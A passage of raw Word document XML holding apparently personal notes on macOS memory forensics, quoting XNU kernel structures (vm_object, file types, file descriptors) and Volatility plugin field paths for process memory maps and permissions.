          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>VM_PIP_DEBUG_MAX_REFS</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VM_PIP_DEBUG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queue_chain_t       objq</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object queue - currently used for purgable queues */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B40F2B" w:rsidRPr="00B40F2B" w:rsidRDefault="00B40F2B" w:rsidP="00B40F2B">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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if</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> DEBUG</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void</w:t>
      </w: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purgeable_owner_bt</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>16</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task_t vo_purgeable_volatilizer</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</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who made it volatile?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sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>purgeable_volatilizer_bt</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>];</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color w:val="008000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>#endif</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* DEBUG */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B40F2B" w:rsidRPr="00B40F2B" w:rsidRDefault="00B40F2B" w:rsidP="00B40F2B">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B40F2B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E6547" w:rsidRDefault="002F720D" w:rsidP="008E6547">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="49" w:name="_Toc445313253"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>map names</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
    </w:p>
    <w:p w:rsidR="002432E8" w:rsidRPr="002432E8" w:rsidRDefault="002432E8" w:rsidP="002432E8">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002432E8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">e.g. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="002432E8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>libauditd.0.dylib</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F720D" w:rsidRPr="00AD72D9" w:rsidRDefault="002F720D" w:rsidP="002F720D">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD72D9">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>M:\Work\Mac_All\Mac_source\volatility-master\volatility\plugins\overlays\mac\mac.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F720D" w:rsidRDefault="002F720D" w:rsidP="002F720D">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>vm_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>object = (vm_object)proc</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA2766">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D10DC4">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>task.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next</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.object</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F720D" w:rsidRDefault="002F720D" w:rsidP="002F720D">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>vnode_object</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F720D" w:rsidRDefault="002F720D" w:rsidP="002F720D">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>vnode_pager</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F720D" w:rsidRPr="007368EC" w:rsidRDefault="002F720D" w:rsidP="002F720D">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>vnode.v_name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E6547" w:rsidRDefault="008E6547" w:rsidP="008E6547">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="100" w:firstLine="131"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008E6547" w:rsidRPr="002432E8" w:rsidRDefault="002F720D" w:rsidP="008E6547">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="50" w:name="_Toc445313254"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>map start/end</w:t>
      </w:r>
      <w:bookmarkEnd w:id="50"/>
    </w:p>
    <w:p w:rsidR="008E6547" w:rsidRDefault="002F720D" w:rsidP="002F720D">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="100" w:firstLine="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>proc</w:t>
      </w:r>
      <w:r w:rsidRPr="002F720D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.task</w:t>
      </w:r>
      <w:r w:rsidRPr="00D10DC4">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>.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2F720D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="002F720D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>start/end</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002432E8" w:rsidRPr="002432E8" w:rsidRDefault="002432E8" w:rsidP="002432E8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="_Toc445313255"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>perms</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
    </w:p>
    <w:p w:rsidR="002432E8" w:rsidRDefault="005B48FC" w:rsidP="002432E8">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="100" w:firstLine="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">e.g. </w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>rxw</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B48FC" w:rsidRDefault="005B48FC" w:rsidP="005B48FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="425"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>vm_map_entry</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> = proc</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA2766">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D10DC4">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>task.map.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D10DC4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>hdr</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links</w:t>
      </w:r>
      <w:r w:rsidRPr="00D10DC4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D10DC4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>next</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B48FC" w:rsidRPr="005B48FC" w:rsidRDefault="005B48FC" w:rsidP="005B48FC">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="100" w:firstLine="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B48FC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>perms = vm_map_entry.</w:t>
      </w:r>
      <w:r w:rsidRPr="005B48FC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>protection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00955822" w:rsidRPr="008E6547" w:rsidRDefault="00955822" w:rsidP="00955822"/>
    <w:p w:rsidR="000A4450" w:rsidRDefault="000A4450" w:rsidP="000A4450">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="_Toc445313256"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Files</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>
      <w:r w:rsidR="00543C2C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA6190" w:rsidRDefault="00AA6190" w:rsidP="00AA6190"/>
    <w:p w:rsidR="00AA6190" w:rsidRPr="00AA6190" w:rsidRDefault="00AA6190" w:rsidP="00AA6190">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA6190">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>M:\Work\Mac_All\Mac_source\10.10\xnu-2782.1.97\bsd\sys\file_internal.h</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA6190" w:rsidRPr="00AA6190" w:rsidRDefault="00AA6190" w:rsidP="00AA6190">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA6190">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA6190">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* file types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b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>typedef</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA6190">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA6190">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>enum</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA6190">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA6190">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</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VNODE     </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color w:val="008080"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1</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file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SOCKET</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communications endpoint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PSXSHM</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POSIX Shared memory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PSXSEM</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POSIX Semaphores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KQUEUE</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kqueue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PIPE</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pipe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t xml:space="preserve">    DTYPE_FSEVENTS</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA6190">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA6190">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA6190">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* fsevents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sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    DTYPE_ATALK     </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA6190">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* (obsolete) */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA6190" w:rsidRPr="00AA6190" w:rsidRDefault="00AA6190" w:rsidP="00AA6190">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA6190">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA6190">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> file_type_t</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA6190">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA6190" w:rsidRPr="00AA6190" w:rsidRDefault="00AA6190" w:rsidP="00AA6190"/>
    <w:p w:rsidR="0076052F" w:rsidRDefault="0076052F" w:rsidP="0076052F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="53" w:name="_Toc445313257"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>file descriptor</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
    </w:p>
    <w:p w:rsidR="000A4AF5" w:rsidRDefault="000A4AF5" w:rsidP="000A4AF5"/>
    <w:p w:rsidR="000A4AF5" w:rsidRPr="000A4AF5" w:rsidRDefault="000A4AF5" w:rsidP="000A4AF5">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A4AF5">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>M:\Work\Mac_All\Mac_source\10.10\xnu-2782.1.97\bsd\sys\filedesc.h</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filedesc </w:t>
      </w:r>
      <w:r w:rsidRPr="0076052F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</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fileproc </w:t>
      </w:r>
      <w:r w:rsidRPr="0076052F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
